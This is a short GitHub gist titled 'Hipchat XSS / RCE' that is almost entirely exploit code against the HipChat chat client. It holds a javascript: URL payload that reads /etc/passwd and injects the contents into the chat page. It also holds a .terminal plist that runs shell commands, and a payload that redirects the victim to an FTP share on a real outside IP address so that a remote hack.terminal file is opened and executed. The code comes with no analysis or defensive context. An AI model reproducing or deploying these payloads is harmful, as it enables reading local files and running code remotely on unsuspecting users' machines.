Skip to content

Instantly share code, notes, and snippets.

@matt-

matt-/file_include.js Secret

Last active Feb 22, 2019
Embed
What would you like to do?
Hipchat XSS / RCE
javascript://comment[\r\n]
r=new XMLHttpRequest();
r.open('GET','file:///etc/passwd',false);
r.send(null);
document.getElementById('chat_text').innerHTML=r.responseText;
<dict>
<key>WindowTitle</key>
<string>Hacked!!!</string>
<key>CommandString</key>
<string>
cat /etc/passwd;
osascript -e 'display dialog "You just got hacked!"'
</string>
...
javascript://comment
location.href="ftp://anonymous:x@104.131.88.251/";
window.setTimeout(function(){location.href="file:///Volumes/104.131.88.251/hack.terminal";},5000)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.